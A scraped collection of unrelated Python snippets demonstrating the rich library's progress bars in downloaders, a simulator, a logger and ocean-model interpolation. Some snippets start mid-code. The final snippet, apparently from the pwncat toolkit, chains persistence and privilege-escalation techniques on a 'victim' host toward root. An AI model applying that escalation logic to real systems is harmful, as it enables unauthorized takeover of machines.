                f"[yellow]{filename}[/yellow]\n"
                f"Please use '.mp4', '.avi', or provide a custom OpenCV fourcc codec name."
            )
            return None  # Had to add this return to make mypya happy. I don't like this.

    def abbreviate_description(self, description: str) -> str:
        """Conditionally abbreviate description so that progress bar fits in small terminals"""
        terminal_columns, _ = get_terminal_size()
        space_for_description = (int(terminal_columns) - 25
                                 )  # Leave 25 space for progressbar
        if len(description) < space_for_description:
            return description
        else:
            return "{} ... {}".format(
                description[:space_for_description // 2 - 3],
                description[-space_for_description // 2 + 3:],
            )
    console = Console()

    with open('TERMINAL.md') as readme:
        markdown = Markdown(readme.read())

    console.print(markdown)

    while not valid:
        urls = input('Enter URL address: ')

        for url in urls.split(','):
            path = pathlib.PurePath(url)
            name, suffix = path.name, path.suffix
            extension = suffix if suffix in VALID_IMAGE_EXTENSIONS else False

            if valid := validate_url(url, extension):
                files.append((url, name))

    progress = Progress(
        '[progress.description]{task.description}',
        BarColumn(),
        '[magenta]{task.completed} of {task.total} files downloaded',
        TimeRemainingColumn()
    )

    with progress:
        task = progress.add_task("Downloading files...", total=len(files))
        for image_url, name in files:
            download(image_url, name)
            progress.update(task, advance=1)
Exemplo n.º 10
0
    BarColumn(bar_width=None),
    "[progress.percentage]{task.percentage:>3.1f}%",
    "•",
    DownloadColumn(),
    "•",
    TransferSpeedColumn(),
    "•",
    TimeRemainingColumn(),
)


# progress = Progress(
#     "[progress.description]{task.description}",
#     BarColumn(),
#     "[progress.percentage]{task.percentage:>3.0f}%",
#     TimeRemainingColumn(),
# )

A = 0
with progress:

    task1 = progress.add_task("[red]Downloading...", A=A, total=1000)
    task2 = progress.add_task("[green]Processing...", A=A, total=1000)
    task3 = progress.add_task("[cyan]Cooking...", A=A, total=1000)

    while not progress.finished:
        A += 1
        progress.update(task1, advance=0.5)
        progress.update(task2, advance=0.3)
        progress.update(task3, advance=0.9)
        time.sleep(0.02)
Exemplo n.º 11
0
class Downloader:
    def __init__(self, args: CmdArgs):
        self.logger = logging.getLogger('downloader')
        self.args = args
        self.exit = False
        # <---来自命令行的设置--->
        self.max_concurrent_downloads = 1
        # <---进度条--->
        self.progress = Progress(
            TextColumn("[bold blue]{task.fields[name]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.2f}%", "•",
            DownloadColumn(binary_units=True), "•", TransferSpeedColumn(), "•",
            TimeRemainingColumn())
        self.terminate = False
        signal.signal(signal.SIGINT, self.stop)
        signal.signal(signal.SIGTERM, self.stop)

    def stop(self, signum: int, frame):
        self.terminate = True

    def get_conn(self):
        '''
        connector在一个ClientSession使用后可能就会关闭
        若需要再次使用则需要重新生成
        '''
        return TCPConnector(
            ttl_dns_cache=300,
            ssl=False,
            limit_per_host=self.args.limit_per_host,
            limit=500,
            force_close=not self.args.disable_force_close,
            enable_cleanup_closed=not self.args.disable_force_close)

    def daemon(self):
        '''
        一直循环调度下载和更新进度
        '''
        if self.args.repl is False:
            self.download_stream()
            return
        while self.exit:
            break

    def download_stream(self):
        extractor = Extractor(self.args)
        streams = extractor.fetch_metadata(self.args.URI[0])
        loop = get_event_loop()
        loop.run_until_complete(self.download_all_segments(loop, streams))
        loop.close()

    def get_selected_index(self, length: int) -> list:
        selected = []
        try:
            text = input('请输入要下载流的序号:\n').strip()
        except EOFError:
            click.secho('未选择流,退出')
            return []
        if text == '':
            return [index for index in range(length + 1)]
        elif text.isdigit():
            return [int(text)]
        elif '-' in text and len(text.split('-')) == 2:
            start, end = text.split('-')
            if start.strip().isdigit() and end.strip().isdigit():
                return [
                    index for index in range(int(start.strip()),
                                             int(end.strip()) + 1)
                ]
        elif text.replace(' ', '').isdigit():
            for index in text.split(' '):
                if index.strip().isdigit():
                    if int(index.strip()) <= length:
                        selected.append(int(index))
            return selected
        elif text.replace(',', '').replace(' ', '').isdigit():
            for index in text.split(','):
                if index.strip().isdigit():
                    if int(index.strip()) <= length:
                        selected.append(int(index))
            return selected
        return selected

    async def download_all_segments(self, loop: AbstractEventLoop,
                                    streams: List[Stream]):
        if streams is None:
            return
        if len(streams) == 0:
            return
        for index, stream in enumerate(streams):
            stream.show_info(index)
        if self.args.select is True:
            selected = self.get_selected_index(len(streams))
        else:
            selected = [index for index in range(len(streams) + 1)]
        all_results = []
        for index, stream in enumerate(streams):
            if self.terminate is True:
                break
            if index not in selected:
                continue
            click.secho(f'{stream.get_name()} download start.')
            stream.dump_segments()
            max_failed = 5
            while max_failed > 0:
                results = await self.do_with_progress(loop, stream)
                all_results.append(results)
                count_none, count_true, count_false = 0, 0, 0
                for _, flag in results.items():
                    if flag is True:
                        count_true += 1
                    elif flag is False:
                        count_false += 1
                    else:
                        count_none += 1
                # 出现False则说明无法下载
                if count_false > 0:
                    break
                # False 0 出现None则说明需要继续下载 否则合并
                if count_none > 0:
                    max_failed -= 1
                    continue
                else:
                    # if stream.stream_type == 'text':
                    #     # mpd中text类型 一般是字幕直链 跳过合并
                    #     pass
                    if self.args.disable_auto_concat is False:
                        stream.concat(self.args)
                    break
        return all_results

    def get_left_segments(self, stream: Stream):
        completed = 0
        _left_segments = []
        for segment in stream.segments:
            segment_path = segment.get_path()
            if segment_path.exists() is True:
                # 文件落盘 说明下载一定成功了
                if segment_path.stat().st_size == 0:
                    segment_path.unlink()
                else:
                    completed += segment_path.stat().st_size
                    continue
            _left_segments.append(segment)
        return completed, _left_segments

    def init_progress(self, stream: Stream, completed: int):
        stream_id = self.progress.add_task("download",
                                           name=stream.get_name(),
                                           start=False)  # TaskID
        if completed > 0:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = completed
                stream.filesize = total
            self.progress.update(stream_id, completed=completed, total=total)
        else:
            if stream.filesize > 0:
                total = stream.filesize
            else:
                total = 0
                stream.filesize = total
            self.progress.update(stream_id, total=total)
        return stream_id

    async def do_with_progress(self, loop: AbstractEventLoop, stream: Stream):
        '''
        下载过程输出进度 并合理处理异常
        '''
        results = {}  # type: Dict[bool]
        tasks = set()  # type: Set[Task]

        def _done_callback(_future: Future) -> None:
            nonlocal results
            if _future.exception() is None:
                segment, status, flag = _future.result()
                if flag is None:
                    pass
                    # print('下载过程中出现已知异常 需重新下载\n')
                elif flag is False:
                    # 某几类已知异常 如状态码不对 返回头没有文件大小 视为无法下载 主动退出
                    cancel_all_task()
                    if status in ['STATUS_CODE_ERROR', 'NO_CONTENT_LENGTH']:
                        print(f'无法下载的m3u8 {status} 退出其他下载任务\n')
                    elif status == 'EXIT':
                        pass
                    else:
                        print(f'出现未知status -> {status} 退出其他下载任务\n')
                results[segment] = flag
            else:
                # 出现未知异常 强制退出全部task
                print('出现未知异常 强制退出全部task\n')
                cancel_all_task()
                results['未知segment'] = False

        def cancel_all_task() -> None:
            for task in tasks:
                task.remove_done_callback(_done_callback)
            for task in filter(lambda task: not task.done(), tasks):
                task.cancel()

        # limit_per_host 根据不同网站和网络状况调整 如果与目标地址连接性较好 那么设置小一点比较好
        completed, _left = self.get_left_segments(stream)
        if len(_left) == 0:
            return results
        # 没有需要下载的则尝试合并 返回False则说明需要继续下载完整
        with self.progress:
            stream_id = self.init_progress(stream, completed)
            client = ClientSession(
                connector=self.get_conn())  # type: ClientSession
            for segment in _left:
                task = loop.create_task(
                    self.download(client, stream_id, stream, segment))
                task.add_done_callback(_done_callback)
                tasks.add(task)
            # 阻塞并等待运行完成
            finished, unfinished = await asyncio.wait(tasks)
            # 关闭ClientSession
            await client.close()
        return results

    async def download(self, client: ClientSession, stream_id: TaskID,
                       stream: Stream, segment: Segment):
        proxy, headers = self.args.proxy, self.args.headers
        status, flag = 'EXIT', True
        try:
            async with client.get(
                    segment.url, proxy=proxy,
                    headers=headers) as resp:  # type: ClientResponse
                _flag = True
                if resp.status == 405:
                    status = 'STATUS_CODE_ERROR'
                    flag = False
                if resp.headers.get('Content-length') is not None:
                    stream.filesize += int(resp.headers["Content-length"])
                    self.progress.update(stream_id, total=stream.filesize)
                else:
                    _flag = False
                if flag:
                    self.progress.start_task(stream_id)
                    while self.terminate is False:
                        data = await resp.content.read(512)
                        if not data:
                            break
                        segment.content.append(data)
                        self.progress.update(stream_id, advance=len(data))
                        if _flag is False:
                            stream.filesize += len(data)
                            self.progress.update(stream_id,
                                                 total=stream.filesize)
        except TimeoutError:
            return segment, 'TimeoutError', None
        except client_exceptions.ClientConnectorError:
            return segment, 'ClientConnectorError', None
        except client_exceptions.ClientPayloadError:
            return segment, 'ClientPayloadError', None
        except client_exceptions.ClientOSError:
            return segment, 'ClientOSError', None
        except client_exceptions.InvalidURL:
            return segment, 'EXIT', False
        except CancelledError:
            return segment, 'EXIT', False
        except Exception as e:
            self.logger.error(f'! -> {segment.url}', exc_info=e)
            return segment, status, False
        if self.terminate:
            return segment, 'EXIT', False
        if flag is False:
            return segment, status, False
        return segment, 'SUCCESS', await self.decrypt(segment)

    async def decrypt(self, segment: Segment) -> bool:
        '''
        解密部分
        '''
        if self.args.disable_auto_decrypt is True:
            return segment.dump()
        if segment.is_encrypt() and segment.is_supported_encryption():
            cipher = CommonAES(segment.xkey.key,
                               binascii.a2b_hex(segment.xkey.iv))
            return cipher.decrypt(segment)
        else:
            return segment.dump()
def main(
    timeline_spec: str,
    *,
    seed: str,
    fake_rate: str,
    iterations: int,
    genuine_rate: str,
    timeline_type: TimelineType,
    topology_type: TopologyType,
) -> None:
    timeline_spec = tuple(map(int, timeline_spec.split(",")))
    timeline_size = len(timeline_spec) - 1
    if timeline_size < 1:
        raise ValueError("Timeline have at least 2 values")

    fake_rate = tuple(map(float, fake_rate.split(",")))
    genuine_rate = tuple(map(float, genuine_rate.split(",")))
    if len(fake_rate) != 2 or len(genuine_rate) != 2:
        raise ValueError("fake_rate and genuine_rate must have two entries")

    timeline = []
    template = [EventType.Fake for _ in range(timeline_size)]
    for pos, spec in enumerate(timeline_spec):
        timeline += [template[:] for _ in range(spec)]
        template[timeline_size - (pos + 1)] = EventType.Genuine

    simulator = Simulator(
        timeline,
        timeline_type=timeline_type,
        topology_type=topology_type,
        fake_rate_heuristic=lambda _: 1,
        genuine_rate_heuristic=lambda _: 1,
        internal_fake_transmission_rate=fake_rate[0],
        external_fake_transmission_rate=fake_rate[1],
        internal_genuine_transmission_rate=genuine_rate[0],
        external_genuine_transmission_rate=genuine_rate[1],
    )

    if seed:
        simulator.load_seed(seed)

    # === GUI Setup === #
    layout = Layout(name="root")

    layout.split(
        Layout(name="header", ratio=7),
        Layout(name="info", ratio=15),
        Layout(name="stats", ratio=10),
        Layout(name="footer", ratio=1),
    )

    layout["header"].update(Panel(simulator, title="Simulator"))

    infos_table: ReversedTable

    def setup_info_table() -> None:
        nonlocal infos_table
        infos_table = ReversedTable(
            Column("Time", style="dim"),
            "Type",
            "Origin",
            title="Events",
            expand=True,
            show_header=True,
            header_style="bold white",
        )
        layout["info"].update(infos_table)

    setup_info_table()

    stats_table: ReversedTable

    def setup_stats_table(*headers: T.Union[Column, str], ) -> None:
        nonlocal stats_table
        stats_table = ReversedTable(
            *headers,
            title="Timeline Distribution",
            expand=True,
            show_header=True,
        )
        layout["stats"].update(stats_table)

    setup_stats_table()

    if iterations == 0:
        progress: T.Union[str, Progress] = "Press CTRL+C to exit..."
        progress_task: T.Optional[TaskID] = None
    else:
        progress = Progress(expand=True)
        progress_task = progress.add_task("[white]Simulating...",
                                          total=iterations)
    # FIXME: Rich has wrong typing definition
    layout["footer"].update(T.cast(RenderableType, progress))

    with Live(layout,
              refresh_per_second=10,
              screen=True,
              redirect_stdout=False,
              redirect_stderr=False):
        with suppress(KeyboardInterrupt):
            for time, event, stats in simulator:
                if 0 < iterations <= simulator.iteration:
                    break

                infos_table.add_row(str(time), event.type.name,
                                    event.origin.name)

                keys = tuple(sorted(key for key in stats.keys()))
                stats_columns = tuple("".join(key.name[0]
                                              for key in state_keys)
                                      for state_keys in keys)
                if len(stats_columns) != len(stats_table.columns):
                    setup_stats_table(*stats_columns)

                stats_table.add_row(*(Pretty(stats[key]) for key in keys))

                if isinstance(progress,
                              Progress) and progress_task is not None:
                    progress.update(progress_task, advance=1)

            layout["footer"].update("Press enter key to exit...")
            input()

    print("Seed:", simulator.seed)
Exemplo n.º 13
0
                        'Custom_02': '/Data/enningxie/Codes/Notebooks/data/test_df_0509.tsv',
                        'Custom_03': '/Data/enningxie/Codes/Notebooks/data/test_df_0511.tsv',
                        'Custom_04': '/Data/enningxie/Codes/Notebooks/data/test_df_0515.tsv'}
 data_2_model = defaultdict(dict)
 with tmp_progress_part:
     for model_name in tmp_ptm_short_names:
         tmp_saved_model_path = '/Data/enningxie/Codes/transformers_xz/saved_models/{}/{}'.format(models_folder,
                                                                                                  model_name)
         tmp_spc_obj = SequencePairClassification(model_name,
                                                  num_labels=1,
                                                  max_length=64,
                                                  saved_model_path=tmp_saved_model_path)
         # console.print(f"----------------{model_name}--------------------", style='info')
         for data_type, valuable_data_path in valuable_data_paths.items():
             tmp_model_2_metrics = dict()
             tmp_task_id = tmp_progress_part.add_task("Evaluate-models", model_name=model_name,
                                                      data_type=data_type, total=99)
             valuable_df = pd.read_csv(valuable_data_path, sep='\t')
             tmp_batch_text_pairs = []
             tmp_label = []
             for _, tmp_row in valuable_df.iterrows():
                 tmp_batch_text_pairs.append((tmp_row.sentence1, tmp_row.sentence2))
                 tmp_label.append(tmp_row.label)
             trained_model = tmp_spc_obj.get_trained_model()
             tmp_start_time = time.perf_counter()
             tmp_pred = tmp_spc_obj.predict_op(trained_model, tmp_batch_text_pairs)
             # print(f'Total cost time: {time.perf_counter() - tmp_start_time:}')
             tmp_threshold = 0.01
             best_threshold = tmp_threshold
             best_precision = 0.0
             best_recall = 0.0
             best_f1_score = 0.0
Exemplo n.º 14
0
class DeviantArtDownloader:
    def __init__(self, client_id, client_secret):
        self.api = Api(client_id, client_secret)
        self.progress = Progress(
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            DownloadColumn(),
            TransferSpeedColumn(),
            "[bold blue]{task.fields[filename]}",
        )
        self.all_t = self.progress.add_task('All', filename='All', start=0)
        self.total_length = 0;

    def download_worker(self, task_id, url, path):
        with open(path, 'wb') as f, GET(url, stream=True) as rq:
            length = int(rq.headers.get('Content-Length', 0))
            self.progress.start_task(task_id)
            self.progress.update(task_id, total=length)
            self.total_length += length
            self.progress.update(self.all_t, total=self.total_length)
            for chunk in rq.iter_content(chunk_size=4096):
                f.write(chunk)
                self.progress.update(task_id, advance=len(chunk))
                self.progress.update(self.all_t, advance=len(chunk))
        return task_id
    
    def search_content(self, tag, max_items=-1):
        n_items = 0
        offset = 0
        while True:
            data = self.api.browse('tags', tag=tag, offset=offset)
            for item in data['results']:
                yield item
                n_items += 1
                if n_items > max_items and max_items > 0:
                    return
            if not data['has_more']:
                break
            offset = data['next_offset']
            
    @staticmethod
    def _make_filename(item):
        src = item.content['src']
        ext = splitext(urlparse(src).path)[1]
        return splitpath(item.url)[1] + ext

    def download(self,
                 tag,
                 out_dir='.',
                 max_items=-1,
                 max_workers=8,
                 list_path=None):
        if not exists(out_dir):
            mkdir(out_dir)
        with self.progress, ThreadPoolExecutor(max_workers=max_workers) as pool:
            self.progress.start_task(self.all_t)
            futures = []
            for item in self.search_content(tag, max_items):
                if list_path:
                    with open(list_path, 'a') as flist:
                        flist.write(item.url + '\n')
                if not item.content:
                    continue
                filename = join(out_dir, self._make_filename(item))
                task_id = self.progress.add_task(
                        'download',
                        filename=item.title,
                        start=0)

                url = item.content['src']
                f = pool.submit(self.download_worker, task_id, url, filename)
                futures.append(f)
                while len(futures) >= max_workers:
                    for f in futures:
                        if f.done():
                            futures.remove(f)
                            self.progress.remove_task(f.result())
                    sleep(0.1)
Exemplo n.º 15
0
class RichLogger(object):
    """Defines a logger based on `rich.RichHandler`.

    Compared to the basic Logger, this logger will decorate the log message in
    a pretty format automatically.
    """
    def __init__(self,
                 work_dir=DEFAULT_WORK_DIR,
                 logfile_name='log.txt',
                 logger_name='logger'):
        """Initializes the logger.

        Args:
            work_dir: The work directory. (default: DEFAULT_WORK_DIR)
            logfile_name: Name of the log file. (default: `log.txt`)
            logger_name: Unique name for the logger. (default: `logger`)
        """
        self.logger = logging.getLogger(logger_name)
        if self.logger.hasHandlers():  # Already existed
            raise SystemExit(
                f'Logger `{logger_name}` has already existed!\n'
                f'Please use another name, or otherwise the '
                f'messages from these two logger may be mixed up.')

        self.logger.setLevel(logging.DEBUG)

        # Print log message with `INFO` level or above onto the screen.
        terminal_console = Console(file=sys.stderr,
                                   log_time=False,
                                   log_path=False)
        terminal_handler = RichHandler(level=logging.INFO,
                                       console=terminal_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
        terminal_handler.setFormatter(logging.Formatter('%(message)s'))
        self.logger.addHandler(terminal_handler)

        # Save log message with all levels into log file if needed.
        if logfile_name:
            os.makedirs(work_dir, exist_ok=True)
            file_stream = open(os.path.join(work_dir, logfile_name), 'a')
            file_console = Console(file=file_stream,
                                   log_time=False,
                                   log_path=False)
            file_handler = RichHandler(level=logging.DEBUG,
                                       console=file_console,
                                       show_time=True,
                                       show_level=True,
                                       show_path=False)
            file_handler.setFormatter(logging.Formatter('%(message)s'))
            self.logger.addHandler(file_handler)

        self.log = self.logger.log
        self.debug = self.logger.debug
        self.info = self.logger.info
        self.warning = self.logger.warning
        self.error = self.logger.error
        self.exception = self.logger.exception
        self.critical = self.logger.critical

        self.pbar = None

    def print(self, *messages, **kwargs):
        """Prints messages without time stamp or log level."""
        for handler in self.logger.handlers:
            handler.console.print(*messages, **kwargs)

    def init_pbar(self, leave=False):
        """Initializes a progress bar which will display on the screen only.

        Args:
            leave: Whether to leave the trace. (default: False)
        """
        assert self.pbar is None

        # Columns shown in the progress bar.
        columns = (
            TextColumn("[progress.description]{task.description}"),
            BarColumn(bar_width=None),
            TextColumn("[progress.percentage]{task.percentage:>5.1f}%"),
            TimeColumn(),
        )

        self.pbar = Progress(*columns,
                             console=self.logger.handlers[0].console,
                             transient=not leave,
                             auto_refresh=True,
                             refresh_per_second=10)
        self.pbar.start()

    def add_pbar_task(self, name, total):
        """Adds a task to the progress bar.

        Args:
            name: Name of the new task.
            total: Total number of steps (samples) contained in the task.

        Returns:
            The task ID.
        """
        assert isinstance(self.pbar, Progress)
        task_id = self.pbar.add_task(name, total=total)
        return task_id

    def update_pbar(self, task_id, advance=1):
        """Updates a certain task in the progress bar.

        Args:
            task_id: ID of the task to update.
            advance: Number of steps advanced onto the target task. (default: 1)
        """
        assert isinstance(self.pbar, Progress)
        if self.pbar.tasks[int(task_id)].finished:
            if self.pbar.tasks[int(task_id)].stop_time is None:
                self.pbar.stop_task(task_id)
        else:
            self.pbar.update(task_id, advance=advance)

    def close_pbar(self):
        """Closes the progress bar"""
        assert isinstance(self.pbar, Progress)
        self.pbar.stop()
        self.pbar = None
Exemplo n.º 16
0
def __interp_grids(src_grid,
                   child_grid,
                   ncsrc,
                   ncout,
                   records=None,
                   threads=2,
                   nx=0,
                   ny=0,
                   weight=10,
                   vmap=None,
                   z_mask=False,
                   pmap=None):
    """
    internal method:  Given a model file (average, history, etc.),
    interpolate the fields onto another gridded file.

    Parameters
    ----------
    src_grid : seapy.model.grid data of source
    child_grid : seapy.model.grid output data grid
    ncsrc : netcdf input file  (History, Average, etc. file)
    ncout : netcdf output file
    [records] : array of the record indices to interpolate
    [threads] : number of processing threads
    [nx] : decorrelation length in grid-cells for x
    [ny] : decorrelation length in grid-cells for y
    [vmap] : variable name mapping
    [z_mask] : mask out depths in z-grids
    [pmap] : use the specified pmap rather than compute it

    Returns
    -------
    None

    """
    # If we don't have a variable map, then do a one-to-one mapping
    if vmap is None:
        vmap = dict()
        for k in seapy.roms.fields:
            vmap[k] = k

    # Generate a file to store the pmap information
    sname = getattr(src_grid, 'name', None)
    cname = getattr(child_grid, 'name', None)
    pmap_file = None if any(v is None for v in (sname, cname)) else \
        sname + "_" + cname + "_pmap.npz"

    # Create or load the pmaps depending on if they exist
    if nx == 0:
        if hasattr(src_grid, "dm") and hasattr(child_grid, "dm"):
            nx = np.ceil(np.ma.mean(src_grid.dm) / np.ma.mean(child_grid.dm))
        else:
            nx = 5
    if ny == 0:
        if hasattr(src_grid, "dn") and hasattr(child_grid, "dn"):
            ny = np.ceil(np.ma.mean(src_grid.dn) / np.ma.mean(child_grid.dn))
        else:
            ny = 5

    if pmap is None:
        if pmap_file is not None and os.path.isfile(pmap_file):
            pmap = np.load(pmap_file)
        else:
            tmp = np.ma.masked_equal(src_grid.mask_rho, 0)
            tmp, pmaprho = seapy.oasurf(src_grid.lon_rho,
                                        src_grid.lat_rho,
                                        tmp,
                                        child_grid.lon_rho,
                                        child_grid.lat_rho,
                                        weight=weight,
                                        nx=nx,
                                        ny=ny)
            tmp = np.ma.masked_equal(src_grid.mask_u, 0)
            tmp, pmapu = seapy.oasurf(src_grid.lon_u,
                                      src_grid.lat_u,
                                      tmp,
                                      child_grid.lon_rho,
                                      child_grid.lat_rho,
                                      weight=weight,
                                      nx=nx,
                                      ny=ny)
            tmp = np.ma.masked_equal(src_grid.mask_v, 0)
            tmp, pmapv = seapy.oasurf(src_grid.lon_v,
                                      src_grid.lat_v,
                                      tmp,
                                      child_grid.lon_rho,
                                      child_grid.lat_rho,
                                      weight=weight,
                                      nx=nx,
                                      ny=ny)
            if pmap_file is not None:
                np.savez(pmap_file, pmaprho=pmaprho, pmapu=pmapu, pmapv=pmapv)
            pmap = {"pmaprho": pmaprho, "pmapu": pmapu, "pmapv": pmapv}

    # Get the time field
    time = seapy.roms.get_timevar(ncsrc)

    # Interpolate the depths from the source to final grid
    src_depth = np.min(src_grid.depth_rho, 0)
    dst_depth = __interp2_thread(src_grid.lon_rho, src_grid.lat_rho, src_depth,
                                 child_grid.lon_rho, child_grid.lat_rho,
                                 pmap["pmaprho"], weight, nx, ny,
                                 child_grid.mask_rho)
    # Make a list of the fields we will interpolate
    smap = {}
    total_count = 0
    for v in vmap:
        fld = seapy.roms.fields.get(vmap[v], {"dims": 3})
        inc = 1
        # Only interpolate the fields we want in the destination
        if (vmap[v] not in ncout.variables) or (v not in ncsrc.variables):
            continue

        # If it is a field we want, determine the size of the field
        # to better track progress
        if fld["dims"] == 3:
            inc = child_grid.n
        if ("rotate" in fld):
            total_count += inc
            continue
        smap[v] = inc
        total_count += inc

    # Generate the list of records to process in each worker thread
    records = np.arange(0, ncsrc.variables[time].shape[0]) \
        if records is None else np.atleast_1d(records)

    # Set up the progress bar
    progress = Progress(
        TextColumn("[bold blue]{task.description:20s}", justify="center"),
        BarColumn(bar_width=None),
        "[progress.percentage]{task.percentage:>3.1f}%", ":",
        TimeElapsedColumn())

    # Do the work, marking the progress to the user
    with progress:
        _task_id = progress.add_task("", total=total_count, start=True)
        for src in smap:
            dest = vmap[src]
            progress.update(_task_id, description=dest)

            # Extra fields will probably be user tracers (biogeochemical)
            fld = seapy.roms.fields.get(dest, {"dims": 3})

            if fld["dims"] == 2:
                # Compute the max number of hold in memory
                maxrecs = np.maximum(
                    1,
                    np.minimum(
                        len(records),
                        np.int(_max_memory / (child_grid.lon_rho.nbytes +
                                              src_grid.lon_rho.nbytes))))
                for rn, recs in enumerate(seapy.chunker(records, maxrecs)):
                    outr = np.s_[rn *
                                 maxrecs:np.minimum((rn + 1) *
                                                    maxrecs, len(records))]
                    ndata = np.ma.array(Parallel(
                        n_jobs=threads,
                        max_nbytes=_max_memory)(delayed(__interp2_thread)(
                            src_grid.lon_rho, src_grid.lat_rho,
                            ncsrc.variables[src][i, :, :], child_grid.lon_rho,
                            child_grid.lat_rho, pmap["pmaprho"], weight, nx,
                            ny, child_grid.mask_rho) for i in recs),
                                        copy=False)
                    ncout.variables[dest][outr, :, :] = ndata
                    ncout.sync()
            else:
                maxrecs = np.maximum(
                    1,
                    np.minimum(
                        len(records),
                        np.int(_max_memory /
                               (child_grid.lon_rho.nbytes * child_grid.n +
                                src_grid.lon_rho.nbytes * src_grid.n))))
                for rn, recs in enumerate(seapy.chunker(records, maxrecs)):
                    outr = np.s_[rn *
                                 maxrecs:np.minimum((rn + 1) *
                                                    maxrecs, len(records))]
                    ndata = np.ma.array(Parallel(
                        n_jobs=threads,
                        max_nbytes=_max_memory)(delayed(__interp3_thread)(
                            src_grid.lon_rho,
                            src_grid.lat_rho,
                            src_grid.depth_rho,
                            ncsrc.variables[src][i, :, :, :],
                            child_grid.lon_rho,
                            child_grid.lat_rho,
                            child_grid.depth_rho,
                            pmap["pmaprho"],
                            weight,
                            nx,
                            ny,
                            child_grid.mask_rho,
                            up_factor=_up_scaling.get(dest, 1.0),
                            down_factor=_down_scaling.get(dest, 1.0))
                                                for i in recs),
                                        copy=False)

                    if z_mask:
                        __mask_z_grid(ndata, dst_depth, child_grid.depth_rho)

                    ncout.variables[dest][outr, :, :, :] = ndata
                    ncout.sync()

            progress.update(_task_id, advance=smap[src])

        # Rotate and Interpolate the vector fields. First, determine which
        # are the "u" and the "v" vmap fields
        try:
            velmap = {
                "u": list(vmap.keys())[list(vmap.values()).index("u")],
                "v": list(vmap.keys())[list(vmap.values()).index("v")]
            }
        except:
            warn("velocity not present in source file")
            return

        srcangle = getattr(src_grid, 'angle', None)
        dstangle = getattr(child_grid, 'angle', None)
        maxrecs = np.minimum(
            len(records),
            np.int(_max_memory / (2 *
                                  (child_grid.lon_rho.nbytes * child_grid.n +
                                   src_grid.lon_rho.nbytes * src_grid.n))))
        progress.update(_task_id, description="velocity")
        inc_count = child_grid.n / maxrecs
        for nr, recs in enumerate(seapy.chunker(records, maxrecs)):
            vel = Parallel(n_jobs=threads, max_nbytes=_max_memory)(
                delayed(__interp3_vel_thread)
                (src_grid.lon_rho, src_grid.lat_rho, src_grid.depth_rho,
                 srcangle, ncsrc.variables[velmap["u"]][i, :, :, :],
                 ncsrc.variables[velmap["v"]][i, :, :, :], child_grid.lon_rho,
                 child_grid.lat_rho, child_grid.depth_rho, dstangle,
                 pmap["pmaprho"], weight, nx, ny, child_grid.mask_rho)
                for i in recs)

            progress.update(_task_id, advance=inc_count * 2)
            for j in range(len(vel)):
                vel_u = np.ma.array(vel[j][0], copy=False)
                vel_v = np.ma.array(vel[j][1], copy=False)
                if z_mask:
                    __mask_z_grid(vel_u, dst_depth, child_grid.depth_rho)
                    __mask_z_grid(vel_v, dst_depth, child_grid.depth_rho)

                if child_grid.cgrid:
                    vel_u = seapy.model.rho2u(vel_u)
                    vel_v = seapy.model.rho2v(vel_v)

                ncout.variables["u"][nr * maxrecs + j, :] = vel_u
                ncout.variables["v"][nr * maxrecs + j, :] = vel_v

                if "ubar" in ncout.variables:
                    # Create ubar and vbar
                    # depth = seapy.adddim(child_grid.depth_u, vel_u.shape[0])
                    ncout.variables["ubar"][nr * maxrecs + j, :] = \
                        np.sum(vel_u * child_grid.depth_u, axis=0) /  \
                        np.sum(child_grid.depth_u, axis=0)
                    progress.update(_task_id, advance=inc_count)

                if "vbar" in ncout.variables:
                    # depth = seapy.adddim(child_grid.depth_v, vel_v.shape[0])
                    ncout.variables["vbar"][nr * maxrecs + j, :] = \
                        np.sum(vel_v * child_grid.depth_v, axis=0) /  \
                        np.sum(child_grid.depth_v, axis=0)
                    progress.update(_task_id, advance=inc_count)

                ncout.sync()

            progress.update(_task_id, advance=total_count)

    # Return the pmap that was used
    return pmap
Exemplo n.º 17
0
    def _escalate(
        self,
        progress: Progress,
        target_user: str = None,
        exclude: Optional[List[str]] = None,
        depth: int = None,
        chain: List["Technique"] = None,
        starting_user=None,
    ) -> List[Tuple["Technique", str]]:
        """ Search for a technique chain which will gain access as the given
        user. """

        if chain is None:
            chain = []

        if exclude is None:
            exclude = []

        if target_user is None:
            target_user = "******"

        # Add a new task to this privesc progress
        task = progress.add_task(
            "description",
            from_user=pwncat.victim.whoami(),
            to_user=target_user,
            status="persistence",
            step="",
            total=40,
        )

        current_user = pwncat.victim.current_user
        if (target_user == current_user.name or current_user.id == 0
                or current_user.name == "root"):
            raise PrivescError(f"you are already {current_user.name}")

        if starting_user is None:
            starting_user = current_user

        if depth is not None and len(chain) > depth:
            raise PrivescError("max depth reached")

        # Capture current shell level
        shlvl = pwncat.victim.getenv("SHLVL")

        installed = list(pwncat.victim.persist.installed)

        # Check if we have a persistence method for this user
        for user, persist in installed:
            if not persist.local or (user != target_user and user is not None):
                continue
            progress.update(task, step=str(persist))
            # Attempt to escalate with the local persistence method
            if persist.escalate(target_user):

                # Stabilize the terminal
                pwncat.victim.reset(hard=False)

                # The method thought it worked, but didn't appear to
                if pwncat.victim.update_user() != target_user:
                    if pwncat.victim.getenv("SHLVL") != shlvl:
                        pwncat.victim.run("exit", wait=False)
                    continue

                # It worked!
                chain.append((PersistenceTechnique(persist,
                                                   target_user), "exit"))
                return chain

        # We update the status to enumerating and move the progress forward
        # but also stop the task to show the "pulsating" bar. This is because
        # we don't have a way of known how many things we will enumerate.
        progress.update(task, status="enumerating", step="initializing")

        # Enumerate escalation options for this user
        techniques = {}
        for method in self.methods:
            if method.id in exclude:
                continue
            try:
                found_techniques = method.enumerate(
                    progress,
                    task,
                    Capability.SHELL | Capability.WRITE | Capability.READ,
                )
                for tech in found_techniques:
                    progress.update(task, step=str(tech))
                    if tech.user not in techniques:
                        techniques[tech.user] = []
                    techniques[tech.user].append(tech)
            except PrivescError:
                pass

        # Try to escalate directly to the target if possible
        if target_user in techniques:
            progress.update(task,
                            status="escalating",
                            step="[yellow]direct escalation[/yellow]")
            try:
                tech, exit_command = self.escalate_single(
                    techniques[target_user], shlvl, progress, task)
                pwncat.victim.reset(hard=False)
                pwncat.victim.update_user()
                chain.append((tech, exit_command))
                return chain
            except PrivescError:
                pass

        # Try to use persistence as other users
        progress.update(task, status="persistence", step="initializing")
